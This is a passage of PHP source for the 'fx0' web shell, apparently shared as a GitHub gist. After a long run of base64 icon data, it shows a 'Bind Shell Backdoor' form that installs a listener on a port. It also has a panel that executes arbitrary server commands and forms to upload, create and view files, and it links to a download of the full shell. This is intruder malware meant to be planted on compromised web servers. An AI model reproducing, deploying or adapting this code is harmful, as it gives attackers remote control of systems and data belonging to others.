"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". | |
"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". | |
"AAA7", | |
"ext_html"=> | |
"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". | |
"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". | |
"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". | |
"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". | |
"ADs=", | |
"ext_jpg"=> | |
"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". | |
"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". | |
"FxEAOw==", | |
"ext_js"=> | |
"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". | |
"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". | |
"a00AjYYBbc/o9HjNniUAADs=", | |
"ext_lnk"=> | |
"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". | |
"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". | |
"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". | |
"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". | |
"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". | |
"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". | |
"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". | |
"ADs=", | |
"ext_log"=> | |
"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". | |
"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", | |
"ext_php"=> | |
"R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0OqpaGeyYpqJlRG/rlwAADs=", | |
"ext_pl"=> | |
"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". | |
"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", | |
"ext_swf"=> | |
"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". | |
"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". | |
"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". | |
"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". | |
"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", | |
"ext_tar"=> | |
"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". | |
"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". | |
"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". | |
"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". | |
"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". | |
"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". | |
"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". | |
"u4tLAgEAOw==", | |
"ext_txt"=> | |
"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". | |
"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". | |
"UpPWG3Ig6Hq/XmRjuZwkAAA7", | |
"ext_wri"=> | |
"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". | |
"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", | |
"ext_xml"=> | |
"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". | |
"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". | |
"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". | |
"IQA7" | |
); | |
$imgequals = array( | |
"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), | |
"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), | |
"ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), | |
"ext_html"=>array("ext_html","ext_htm"), | |
"ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), | |
"ext_lnk"=>array("ext_lnk","ext_url"), | |
"ext_ini"=>array("ext_ini","ext_css","ext_inf"), | |
"ext_doc"=>array("ext_doc","ext_dot"), | |
"ext_js"=>array("ext_js","ext_vbs"), | |
"ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), | |
"ext_wri"=>array("ext_wri","ext_rtf"), | |
"ext_swf"=>array("ext_swf","ext_fla"), | |
"ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), | |
"ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") | |
); | |
if (!$getall) { | |
header("Content-type: image/gif"); | |
header("Cache-control: public"); | |
header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); | |
header("Cache-control: max-age=".(60*60*24*7)); | |
header("Last-Modified: ".date("r",filemtime(__FILE__))); | |
foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} | |
if (empty($images[$img])) {$img = "small_unk";} | |
if (in_array($img,$ext_tar)) {$img = "ext_tar";} | |
echo base64_decode($images[$img]); | |
} | |
else { | |
foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} | |
natsort($images); | |
$k = array_keys($images); | |
echo "<center>"; | |
foreach ($k as $u) {echo $u.":<img src=\"".$surl."x=img&img=".$u."\" border=\"1\"><br>";} | |
echo "</center>"; | |
} | |
exit; | |
} | |
if ($x == "about") { | |
echo "-=] fx0 [=-<br />You can download the shell from <a href=\"http://fx0.name/fx0.rar\">www.fx0.name</a> "; | |
} | |
if ($x == "shbd"){ | |
$msg = $_POST['backcconnmsg']; | |
$emsg = $_POST['backcconnmsge']; | |
echo("<center><b>Bind Shell Backdoor:</b><br><br><form name=form method=POST> | |
Bind Port: <input type='text' name='backconnectport' value='5992'> | |
<input type='hidden' name='use' value='shbd'> | |
<input type='submit' value='Install Backdoor'></form>"); | |
echo("$msg"); | |
echo("$emsg"); | |
echo("</center>"); | |
} | |
echo "</td></tr></table>\n"; | |
?> | |
<div class=barheader2><b>.: COMMANDS PANEL :.</b></div> | |
<table class=mainpanel> | |
<?php | |
if (!$safemode) { | |
?> | |
<tr><td align=right>Command:</td> | |
<td><form method="POST"> | |
<input type=hidden name=x value="cmd"> | |
<input type=hidden name="d" value="<?php echo $dispd; ?>"> | |
<input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"> | |
<input type=hidden name="cmd_txt" value="1"> - <input type=submit name=submit value="Execute"> | |
</form> | |
</td></tr> | |
<tr><td align=right>Quick Commands:</td> | |
<td><form method="POST"> | |
<input type=hidden name=x value="cmd"> | |
<input type=hidden name="d" value="<?php echo $dispd; ?>"> | |
<input type=hidden name="cmd_txt" value="1"> | |
<select name="cmd"> | |
<?php | |
foreach ($cmdaliases as $als) { | |
echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>"; | |
} | |
foreach ($cmdaliases2 as $als) { | |
echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>"; | |
} | |
?> | |
</select> - | |
<input type=submit name=submit value="Execute"> | |
</form> | |
</td></tr> | |
<?php | |
} | |
?> | |
<tr><td align=right>Kernel Info:</td> | |
<td><form method="post" action="http://google.com/search"> | |
<input type="hidden" name="client" value="firefox-a"> | |
<input type="hidden" name="rls" value="org.mozilla:en-US:official"> | |
<input type="hidden" name="hl" value="en"> | |
<input type="hidden" name="hs" value="b7p"> | |
<input name="q" type="text" id="q" size="80" value="<?php echo wordwrap(php_uname()); ?>"> - | |
<input type=submit name="btnG" VALUE="Search"> | |
</form> | |
</td></tr> | |
<tr><td align=right>Upload:</td> | |
<td><form method="POST" enctype="multipart/form-data"> | |
<input type=hidden name=x value="upload"> | |
<input type=hidden name="miniform" value="1"> | |
<input type="file" name="uploadfile"> - <input type=submit name=submit value="Upload"> <?php echo $wdt; ?> | |
</form> | |
</td></tr> | |
<tr><td align=right>Search:</td> | |
<td><form method="POST"><input type=hidden name=x value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"> | |
<input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> - regexp | |
<input type=submit name=submit value="Search"> | |
</form> | |
</td></tr> | |
<tr><td align=right>Make File:</td> | |
<td><form method="POST"><input type=hidden name=x value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit"> | |
<input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> - <input type=submit value="Create"> <?php echo $wdt; ?> | |
</form></td></tr> | |
<tr><td align=right>View File:</td> | |
<td><form method="POST"><input type=hidden name=x value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"> | |
<input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> - <input type=submit value="View"> | |
</form></td></tr> | |
</table> | |
<div class=barheader2 colspan=2><font color=red>-=] fx0 [=-</font></div> | |
</body></html><?php chdir($lastdir); capriv8exit(); ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment